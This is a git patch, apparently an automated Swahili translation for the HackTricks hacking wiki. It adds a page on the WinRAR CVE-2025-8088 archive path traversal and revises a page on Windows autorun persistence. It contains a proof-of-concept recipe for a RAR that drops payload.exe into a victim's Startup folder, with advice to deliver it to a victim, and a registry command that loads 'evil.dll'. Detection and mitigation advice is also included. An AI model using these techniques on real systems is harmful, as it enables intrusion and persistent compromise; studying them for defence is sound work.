From 9f49afb283fabc0a9d3df4b68f7fccee29b224b3 Mon Sep 17 00:00:00 2001
From: Translator <github-actions@github.com>
Date: Wed, 13 Aug 2025 22:16:30 +0000
Subject: [PATCH] Translated
 ['src/generic-hacking/archive-extraction-path-traversal.md',

---
 src/SUMMARY.md                                |  1 +
 .../archive-extraction-path-traversal.md      | 68 ++++++++++++++++++
 ...vilege-escalation-with-autorun-binaries.md | 72 ++++++++++---------
 3 files changed, 109 insertions(+), 32 deletions(-)
 create mode 100644 src/generic-hacking/archive-extraction-path-traversal.md

diff --git a/src/SUMMARY.md b/src/SUMMARY.md
index 68cf84961..bb1d3f659 100644
--- a/src/SUMMARY.md
+++ b/src/SUMMARY.md
@@ -79,6 +79,7 @@
 
 # 🧙‍♂️ Generic Hacking
 
+- [Archive Extraction Path Traversal](generic-hacking/archive-extraction-path-traversal.md)
 - [Brute Force - CheatSheet](generic-hacking/brute-force.md)
 - [Esim Javacard Exploitation](generic-hacking/esim-javacard-exploitation.md)
 - [Exfiltration](generic-hacking/exfiltration.md)
diff --git a/src/generic-hacking/archive-extraction-path-traversal.md b/src/generic-hacking/archive-extraction-path-traversal.md
new file mode 100644
index 000000000..b13cb0ed1
--- /dev/null
+++ b/src/generic-hacking/archive-extraction-path-traversal.md
@@ -0,0 +1,68 @@
+# Archive Extraction Path Traversal ("Zip-Slip" / WinRAR CVE-2025-8088)
+
+{{#include ../banners/hacktricks-training.md}}
+
+## Overview
+
+Mifumo mingi ya archive (ZIP, RAR, TAR, 7-ZIP, nk.) inaruhusu kila kipengee kubeba **njia yake ya ndani**. Wakati chombo cha kutoa kinaheshimu bila kujali njia hiyo, jina la faili lililotengenezwa likiwa na `..` au **njia kamili** (mfano `C:\Windows\System32\`) litandikwa nje ya directory iliyochaguliwa na mtumiaji. Aina hii ya udhaifu inajulikana sana kama *Zip-Slip* au **archive extraction path traversal**.
+
+Matokeo yanatofautiana kutoka kwa kuandika tena faili za kawaida hadi kufikia moja kwa moja **remote code execution (RCE)** kwa kutupa payload katika eneo la **auto-run** kama vile folda ya *Startup* ya Windows.
+
+## Root Cause
+
+1. Mshambuliaji anaunda archive ambapo moja au zaidi ya vichwa vya faili vina:
+* Mfuatano wa kusafiri wa jamaa (`..\..\..\Users\\victim\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\payload.exe`)
+* Njia kamili (`C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\payload.exe`)
+2. Mwathirika anatoa archive hiyo kwa chombo kilicho na udhaifu ambacho kinatumaini njia iliyoingizwa badala ya kuisafisha au kulazimisha kutoa chini ya directory iliyochaguliwa.
+3. Faili inandikwa katika eneo linalodhibitiwa na mshambuliaji na kutekelezwa/kupakiwa wakati mfumo au mtumiaji anachochea njia hiyo.
+
+## Real-World Example – WinRAR ≤ 7.12 (CVE-2025-8088)
+
+WinRAR kwa Windows (ikiwemo `rar` / `unrar` CLI, DLL na chanzo cha kubebeka) ilishindwa kuthibitisha majina ya faili wakati wa kutoa. Archive ya RAR yenye uharibifu ikijumuisha kipengee kama:
+```text
+..\..\..\Users\victim\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\payload.exe
+```
+ingekuwa **nje** ya saraka ya pato iliyochaguliwa na ndani ya *Startup* ya mtumiaji. Baada ya kuingia, Windows inatekeleza kila kitu kilichopo hapo, ikitoa *persistent* RCE.
+
+### Kuunda PoC Archive (Linux/Mac)
+```bash
+# Requires rar >= 6.x
+mkdir -p "evil/../../../Users/Public/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup"
+cp payload.exe "evil/../../../Users/Public/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/"
+rar a -ep evil.rar evil/*
+```
+Options used:
+* `-ep`  – hifadhi njia za faili kama zilivyo (usifute `./` za mbele).
+
+Deliver `evil.rar` to the victim and instruct them to extract it with a vulnerable WinRAR build.
+
+### Observed Exploitation in the Wild
+
+ESET iliripoti kampeni za spear-phishing za RomCom (Storm-0978/UNC2596) ambazo zilihusisha RAR archives zikitumia CVE-2025-8088 kupeleka backdoors zilizobinafsishwa na kuwezesha operesheni za ransomware.
+
+## Detection Tips
+
+* **Static inspection** – Orodhesha entries za archive na uweke alama jina lolote linalo na `../`, `..\\`, *absolute paths* (`C:`) au encodings zisizo za kawaida za UTF-8/UTF-16.
+* **Sandbox extraction** – Fanya decompression kwenye directory inayoweza kutumika mara moja kwa kutumia extractor *salama* (e.g., Python’s `patool`, 7-Zip ≥ latest, `bsdtar`) na uthibitisha njia zinazotokana zinabaki ndani ya directory.
+* **Endpoint monitoring** – Onyesha kwenye executable mpya zilizandikwa kwenye maeneo ya `Startup`/`Run` mara tu archive inafunguliwa na WinRAR/7-Zip/n.k.
+
+## Mitigation & Hardening
+
+1. **Update the extractor** – WinRAR 7.13 inatekeleza usafi wa njia ipasavyo. Watumiaji lazima waishe kwa mkono kwa sababu WinRAR haina mfumo wa auto-update.
+2. Extract archives with the **“Ignore paths”** option (WinRAR: *Extract → "Do not extract paths"*) when possible.
+3. Fungua archives zisizoaminika **ndani ya sandbox** au VM.
+4. Tekeleza application whitelisting na punguza ufikiaji wa kuandika wa mtumiaji kwenye directories za auto-run.
+
+## Additional Affected / Historical Cases
+
+* 2018 – Onyo kubwa la *Zip-Slip* kutoka Snyk lililoathiri maktaba nyingi za Java/Go/JS.
+* 2023 – 7-Zip CVE-2023-4011 traversal inayofanana wakati wa `-ao` merge.
+* Mantiki yoyote ya extraction ya kawaida inayoshindwa kuita `PathCanonicalize` / `realpath` kabla ya kuandika.
+
+## References
+
+- [BleepingComputer – WinRAR zero-day exploited to plant malware on archive extraction](https://www.bleepingcomputer.com/news/security/winrar-zero-day-flaw-exploited-by-romcom-hackers-in-phishing-attacks/)
+- [WinRAR 7.13 Changelog](https://www.win-rar.com/singlenewsview.html?&L=0&tx_ttnews%5Btt_news%5D=283&cHash=a64b4a8f662d3639dec8d65f47bc93c5)
+- [Snyk – Zip Slip vulnerability write-up](https://snyk.io/research/zip-slip-vulnerability)
+
+{{#include ../banners/hacktricks-training.md}}
diff --git a/src/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.md b/src/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.md
index 49857060b..376f25dca 100644
--- a/src/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.md
+++ b/src/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.md
@@ -11,9 +11,9 @@
 wmic startup get caption,command 2>nul & ^
 Get-CimInstance Win32_StartupCommand | select Name, command, Location, User | fl
 ```
-## Kazi za Ratiba
+## Scheduled Tasks
 
-**Kazi** zinaweza kuandaliwa kuendesha kwa **mara kwa mara** fulani. Angalia ni binaries zipi zimepangwa kuendesha na:
+**Tasks** zinaweza kuandaliwa kuendesha kwa **mara fulani**. Angalia ni binaries gani zimeandaliwa kuendesha na:
 ```bash
 schtasks /query /fo TABLE /nh | findstr /v /i "disable deshab"
 schtasks /query /fo LIST 2>nul | findstr TaskName
@@ -35,10 +35,18 @@ dir /b "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup" 2>nul
 Get-ChildItem "C:\Users\All Users\Start Menu\Programs\Startup"
 Get-ChildItem "C:\Users\$env:USERNAME\Start Menu\Programs\Startup"
 ```
+> **FYI**: Utoaji wa archive *path traversal* vulnerabilities (kama ile inayotumiwa katika WinRAR kabla ya 7.13 – CVE-2025-8088) inaweza kutumika ku **weka payloads moja kwa moja ndani ya folda hizi za Startup wakati wa kufungua**, na kusababisha utekelezaji wa msimbo wakati wa kuingia kwa mtumiaji anayefuata. Kwa maelezo zaidi kuhusu mbinu hii angalia:
+
+{{#ref}}
+../../generic-hacking/archive-extraction-path-traversal.md
+{{#endref}}
+
+
+
 ## Registry
 
-> [!NOTE]
-> [Note from here](https://answers.microsoft.com/en-us/windows/forum/all/delete-registry-key/d425ae37-9dcc-4867-b49c-723dcd15147f): Kichupo cha **Wow6432Node** kinadhihirisha kuwa unatumia toleo la Windows la 64-bit. Mfumo wa uendeshaji unatumia funguo hii kuonyesha mtazamo tofauti wa HKEY_LOCAL_MACHINE\SOFTWARE kwa programu za 32-bit zinazotumika kwenye toleo la Windows la 64-bit.
+> [!TIP]
+> [Kumbuka kutoka hapa](https://answers.microsoft.com/en-us/windows/forum/all/delete-registry-key/d425ae37-9dcc-4867-b49c-723dcd15147f): Kichupo cha **Wow6432Node** kinadhihirisha kuwa unatumia toleo la Windows la 64-bit. Mfumo wa uendeshaji unatumia funguo hii kuonyesha mtazamo tofauti wa HKEY_LOCAL_MACHINE\SOFTWARE kwa programu za 32-bit zinazotumika kwenye toleo la Windows la 64-bit.
 
 ### Runs
 
@@ -56,9 +64,9 @@ Get-ChildItem "C:\Users\$env:USERNAME\Start Menu\Programs\Startup"
 - `HKLM\Software\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\Runonce`
 - `HKLM\Software\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\RunonceEx`
 
-Funguo za registry zinazojulikana kama **Run** na **RunOnce** zimeundwa ili kutekeleza programu kiotomatiki kila wakati mtumiaji anapoingia kwenye mfumo. Mstari wa amri uliotolewa kama thamani ya data ya funguo umewekwa mipaka ya herufi 260 au chini.
+Funguo za registry zinazojulikana kama **Run** na **RunOnce** zimedhamiria kutekeleza programu kiotomatiki kila wakati mtumiaji anapoingia kwenye mfumo. Mstari wa amri uliotolewa kama thamani ya data ya funguo umewekwa mipaka ya herufi 260 au chini.
 
-**Service runs** (zinaweza kudhibiti kuanzishwa kiotomatiki kwa huduma wakati wa boot):
+**Huduma inazoendesha** (zinaweza kudhibiti kuanzishwa kiotomatiki kwa huduma wakati wa boot):
 
 - `HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce`
 - `HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce`
@@ -74,15 +82,15 @@ Funguo za registry zinazojulikana kama **Run** na **RunOnce** zimeundwa ili kute
 - `HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx`
 - `HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnceEx`
 
-Katika Windows Vista na toleo la baadaye, funguo za **Run** na **RunOnce** hazitengenezwi kiotomatiki. Kuingizwa katika funguo hizi kunaweza kuanzisha programu moja kwa moja au kuzitaja kama utegemezi. Kwa mfano, ili kupakia faili ya DLL wakati wa kuingia, mtu anaweza kutumia funguo ya registry ya **RunOnceEx** pamoja na funguo ya "Depend". Hii inaonyeshwa kwa kuongeza kuingizwa kwa registry kutekeleza "C:\temp\evil.dll" wakati wa kuanzishwa kwa mfumo:
+Katika Windows Vista na toleo la baadaye, funguo za **Run** na **RunOnce** hazizalishwi kiotomatiki. Kuingizwa katika funguo hizi kunaweza kuanzisha programu moja kwa moja au kuzitaja kama utegemezi. Kwa mfano, ili kupakia faili ya DLL wakati wa kuingia, mtu anaweza kutumia funguo ya registry ya **RunOnceEx** pamoja na funguo ya "Depend". Hii inaonyeshwa kwa kuongeza kuingizwa kwa registry ili kutekeleza "C:\temp\evil.dll" wakati wa kuanzishwa kwa mfumo:
 ```
 reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend /v 1 /d "C:\\temp\\evil.dll"
 ```
-> [!NOTE]
-> **Exploit 1**: Ikiwa unaweza kuandika ndani ya yoyote ya rejista zilizotajwa ndani ya **HKLM** unaweza kuongeza mamlaka wakati mtumiaji tofauti anapoingia.
+> [!TIP]
+> **Exploit 1**: Ikiwa unaweza kuandika ndani ya yoyote ya registry zilizotajwa ndani ya **HKLM** unaweza kuongeza mamlaka wakati mtumiaji tofauti anapoingia.
 
-> [!NOTE]
-> **Exploit 2**: Ikiwa unaweza kufuta yoyote ya binaries zilizotajwa kwenye yoyote ya rejista ndani ya **HKLM** unaweza kubadilisha binary hiyo kwa backdoor wakati mtumiaji tofauti anapoingia na kuongeza mamlaka.
+> [!TIP]
+> **Exploit 2**: Ikiwa unaweza kufuta yoyote ya binaries zilizoorodheshwa kwenye yoyote ya registry ndani ya **HKLM** unaweza kubadilisha binary hiyo kwa backdoor wakati mtumiaji tofauti anapoingia na kuongeza mamlaka.
 ```bash
 #CMD
 reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
@@ -138,17 +146,17 @@ Get-ItemProperty -Path 'Registry::HKLM\Software\Wow6432Node\Microsoft\Windows\Ru
 Get-ItemProperty -Path 'Registry::HKCU\Software\Microsoft\Windows\RunOnceEx'
 Get-ItemProperty -Path 'Registry::HKCU\Software\Wow6432Node\Microsoft\Windows\RunOnceEx'
 ```
-### Njia ya Kuanzisha
+### Startup Path
 
 - `HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders`
 - `HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders`
 - `HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders`
 - `HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders`
 
-Viungo vilivyowekwa katika folda ya **Kuanzisha** vitasababisha huduma au programu kuanzishwa wakati wa kuingia kwa mtumiaji au upya wa mfumo. Mahali pa folda ya **Kuanzisha** lin defined katika rejista kwa mipango ya **Mashine ya Mitaa** na **Mtumiaji wa Sasa**. Hii inamaanisha kwamba kiungo chochote kilichoongezwa kwenye maeneo haya maalum ya **Kuanzisha** kitahakikisha huduma au programu iliyounganishwa inaanza baada ya mchakato wa kuingia au upya, na kufanya kuwa njia rahisi ya kupanga programu kuendesha kiotomatiki.
+Mifano ya njia iliyo katika folda ya **Startup** itasababisha huduma au programu kuanzishwa wakati wa kuingia kwa mtumiaji au upya wa mfumo. Mahali pa folda ya **Startup** lin defined katika rejista kwa ajili ya **Local Machine** na **Current User**. Hii inamaanisha kwamba kila kifupisho kilichoongezwa kwenye maeneo haya maalum ya **Startup** kitahakikisha huduma au programu iliyounganishwa inaanza baada ya mchakato wa kuingia au upya, na kufanya kuwa njia rahisi ya kupanga programu kuendesha kiotomatiki.
 
-> [!NOTE]
-> Ikiwa unaweza kubadilisha chochote \[User] Shell Folder chini ya **HKLM**, utaweza kuielekeza kwenye folda inayodhibitiwa na wewe na kuweka backdoor ambayo itatekelezwa wakati wowote mtumiaji anapoingia kwenye mfumo ikipandisha mamlaka.
+> [!TIP]
+> Ikiwa unaweza kubadilisha chochote \[User] Shell Folder chini ya **HKLM**, utaweza kuielekeza kwenye folda inayodhibitiwa na wewe na kuweka backdoor ambayo itatekelezwa wakati wowote mtumiaji anapoingia kwenye mfumo ikipandisha haki.
 ```bash
 reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /v "Common Startup"
 reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v "Common Startup"
@@ -164,14 +172,14 @@ Get-ItemProperty -Path 'Registry::HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion
 
 `HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon`
 
-Kawaida, ufunguo wa **Userinit** umewekwa kwenye **userinit.exe**. Hata hivyo, ikiwa ufunguo huu umebadilishwa, executable iliyoainishwa pia itazinduliwa na **Winlogon** wakati wa kuingia kwa mtumiaji. Vivyo hivyo, ufunguo wa **Shell** unakusudia kuelekeza kwenye **explorer.exe**, ambayo ni shell ya kawaida kwa Windows.
+Kawaida, ufunguo wa **Userinit** umewekwa kwa **userinit.exe**. Hata hivyo, ikiwa ufunguo huu umebadilishwa, executable iliyoainishwa pia itazinduliwa na **Winlogon** wakati wa kuingia kwa mtumiaji. Vivyo hivyo, ufunguo wa **Shell** unakusudia kuelekeza kwa **explorer.exe**, ambayo ni shell ya kawaida kwa Windows.
 ```bash
 reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Userinit"
 reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Shell"
 Get-ItemProperty -Path 'Registry::HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon' -Name "Userinit"
 Get-ItemProperty -Path 'Registry::HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon' -Name "Shell"
 ```
-> [!NOTE]
+> [!TIP]
 > Ikiwa unaweza kubadilisha thamani ya registry au binary, utaweza kuongeza mamlaka.
 
 ### Sera za Mipangilio
@@ -188,21 +196,21 @@ Get-ItemProperty -Path 'Registry::HKCU\Software\Microsoft\Windows\CurrentVersion
 ```
 ### AlternateShell
 
-### Kubadilisha Amri ya Safe Mode Command Prompt
+### Kubadilisha Amri ya Salama ya Msimbo
 
-Katika Windows Registry chini ya `HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot`, kuna thamani ya **`AlternateShell`** iliyowekwa kwa chaguo-msingi kuwa `cmd.exe`. Hii inamaanisha wakati unachagua "Safe Mode with Command Prompt" wakati wa kuanzisha (kwa kubonyeza F8), `cmd.exe` inatumika. Lakini, inawezekana kuandaa kompyuta yako kuanza moja kwa moja katika hali hii bila kuhitaji kubonyeza F8 na kuchagua kwa mikono.
+Katika Usajili wa Windows chini ya `HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot`, kuna thamani ya **`AlternateShell`** iliyowekwa kwa chaguo-msingi kuwa `cmd.exe`. Hii inamaanisha unapochagua "Salama Msimbo na Amri" wakati wa kuanzisha (kwa kubonyeza F8), `cmd.exe` inatumika. Lakini, inawezekana kuandaa kompyuta yako kuanzisha moja kwa moja katika hali hii bila kuhitaji kubonyeza F8 na kuchagua kwa mikono.
 
-Hatua za kuunda chaguo la kuanzisha ili kuanza moja kwa moja katika "Safe Mode with Command Prompt":
+Hatua za kuunda chaguo la kuanzisha ili kuanzisha moja kwa moja katika "Salama Msimbo na Amri":
 
-1. Badilisha sifa za faili ya `boot.ini` kuondoa flags za kusoma pekee, mfumo, na zilizofichwa: `attrib c:\boot.ini -r -s -h`
+1. Badilisha sifa za faili ya `boot.ini` kuondoa bendera za kusoma pekee, mfumo, na zilizofichwa: `attrib c:\boot.ini -r -s -h`
 2. Fungua `boot.ini` kwa ajili ya kuhariri.
 3. Ingiza mstari kama: `multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /fastdetect /SAFEBOOT:MINIMAL(ALTERNATESHELL)`
 4. Hifadhi mabadiliko kwenye `boot.ini`.
 5. Rudisha sifa za awali za faili: `attrib c:\boot.ini +r +s +h`
 
-- **Exploit 1:** Kubadilisha funguo za **AlternateShell** katika rejista kunaruhusu usanidi wa shell ya amri ya kawaida, huenda kwa ufikiaji usioidhinishwa.
-- **Exploit 2 (PATH Write Permissions):** Kuwa na ruhusa za kuandika sehemu yoyote ya mfumo wa **PATH** variable, hasa kabla ya `C:\Windows\system32`, kunakuwezesha kutekeleza `cmd.exe` ya kawaida, ambayo inaweza kuwa backdoor ikiwa mfumo utaanzishwa katika Safe Mode.
-- **Exploit 3 (PATH na boot.ini Write Permissions):** Upatikanaji wa kuandika kwenye `boot.ini` unaruhusu kuanzisha Safe Mode kiotomatiki, kurahisisha ufikiaji usioidhinishwa wakati wa kuanzisha tena.
+- **Kuvunja 1:** Kubadilisha funguo za usajili za **AlternateShell** kunaruhusu usanidi wa shell ya amri ya kawaida, huenda kwa ufikiaji usioidhinishwa.
+- **Kuvunja 2 (Ruhusa za Kuandika PATH):** Kuwa na ruhusa za kuandika sehemu yoyote ya mfumo wa **PATH** variable, hasa kabla ya `C:\Windows\system32`, kunakuwezesha kutekeleza `cmd.exe` ya kawaida, ambayo inaweza kuwa nyuma ya mlango ikiwa mfumo utaanzishwa katika Hali ya Salama.
+- **Kuvunja 3 (Ruhusa za Kuandika PATH na boot.ini):** Upatikanaji wa kuandika kwenye `boot.ini` unaruhusu kuanzisha Hali ya Salama kiotomatiki, ikirahisisha ufikiaji usioidhinishwa kwenye kuanzisha kwa pili.
 
 Ili kuangalia mipangilio ya sasa ya **AlternateShell**, tumia amri hizi:
 ```bash
@@ -211,7 +219,7 @@ Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Co
 ```
 ### Installed Component
 
-Active Setup ni kipengele katika Windows ambacho **kinanzishwa kabla ya mazingira ya desktop kupakiwa kikamilifu**. Kinatoa kipaumbele kwa utekelezaji wa amri fulani, ambazo lazima zikamilike kabla ya kuendelea na kuingia kwa mtumiaji. Mchakato huu unafanyika hata kabla ya kuanzishwa kwa vitu vingine vya kuanzisha, kama vile vile vilivyomo katika sehemu za Run au RunOnce za rejista.
+Active Setup ni kipengele katika Windows ambacho **kinanzishwa kabla ya mazingira ya desktop kupakiwa kikamilifu**. Kinapa kipaumbele utekelezaji wa amri fulani, ambazo lazima zikamilike kabla ya kuendelea na kuingia kwa mtumiaji. Mchakato huu unafanyika hata kabla ya kuanzishwa kwa entries nyingine za kuanzisha, kama zile katika sehemu za Run au RunOnce za rejista.
 
 Active Setup inasimamiwa kupitia funguo za rejista zifuatazo:
 
@@ -220,14 +228,14 @@ Active Setup inasimamiwa kupitia funguo za rejista zifuatazo:
 - `HKCU\SOFTWARE\Microsoft\Active Setup\Installed Components`
 - `HKCU\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components`
 
-Ndani ya funguo hizi, kuna funguo ndogo mbalimbali, kila moja ikihusiana na kipengele maalum. Thamani za funguo ambazo zina umuhimu maalum ni pamoja na:
+Ndani ya funguo hizi, kuna funguo ndogo mbalimbali, kila moja ikihusiana na kipengele maalum. Thamani za funguo zinazovutia hasa ni pamoja na:
 
 - **IsInstalled:**
 - `0` inaonyesha amri ya kipengele haitatekelezwa.
 - `1` inamaanisha amri itatekelezwa mara moja kwa kila mtumiaji, ambayo ni tabia ya kawaida ikiwa thamani ya `IsInstalled` haipo.
-- **StubPath:** Inaelezea amri itakayotekelezwa na Active Setup. Inaweza kuwa amri yoyote halali ya mistari, kama vile kuanzisha `notepad`.
+- **StubPath:** Inaelezea amri itakayotekelezwa na Active Setup. Inaweza kuwa amri yoyote halali ya mstari, kama kuanzisha `notepad`.
 
-**Security Insights:**
+**Mawazo ya Usalama:**
 
 - Kubadilisha au kuandika kwenye funguo ambapo **`IsInstalled`** imewekwa kuwa `"1"` na **`StubPath`** maalum kunaweza kusababisha utekelezaji wa amri zisizoidhinishwa, huenda kwa ajili ya kupandisha hadhi.
 - Kubadilisha faili ya binary inayorejelewa katika thamani yoyote ya **`StubPath`** pia kunaweza kufanikisha kupandisha hadhi, ikiwa na ruhusa za kutosha.
@@ -254,7 +262,7 @@ Ili kuchunguza BHOs zilizosajiliwa kwenye mfumo, unaweza kukagua funguo zifuataz
 
 Kila BHO inawakilishwa na **CLSID** yake katika rejista, ikihudumu kama kitambulisho cha kipekee. Taarifa za kina kuhusu kila CLSID zinaweza kupatikana chini ya `HKLM\SOFTWARE\Classes\CLSID\{<CLSID>}`.
 
-Ili kuuliza BHOs katika rejista, amri hizi zinaweza kutumika:
+Kwa kuuliza BHOs katika rejista, amri hizi zinaweza kutumika:
 ```bash
 reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects" /s
 reg query "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects" /s
@@ -297,11 +305,11 @@ Kumbuka kwamba tovuti zote ambapo unaweza kupata autoruns **zimeshachunguzwa na*
 ```
 autorunsc.exe -m -nobanner -a * -ct /accepteula
 ```
-## Zaidi
+## More
 
-**Pata zaidi kuhusu Autoruns kama vile rekodi katika** [**https://www.microsoftpressstore.com/articles/article.aspx?p=2762082\&seqNum=2**](https://www.microsoftpressstore.com/articles/article.aspx?p=2762082&seqNum=2)
+**Pata zaidi ya Autoruns kama vile registries katika** [**https://www.microsoftpressstore.com/articles/article.aspx?p=2762082\&seqNum=2**](https://www.microsoftpressstore.com/articles/article.aspx?p=2762082&seqNum=2)
 
-## Marejeleo
+## References
 
 - [https://resources.infosecinstitute.com/common-malware-persistence-mechanisms/#gref](https://resources.infosecinstitute.com/common-malware-persistence-mechanisms/#gref)
 - [https://attack.mitre.org/techniques/T1547/001/](https://attack.mitre.org/techniques/T1547/001/)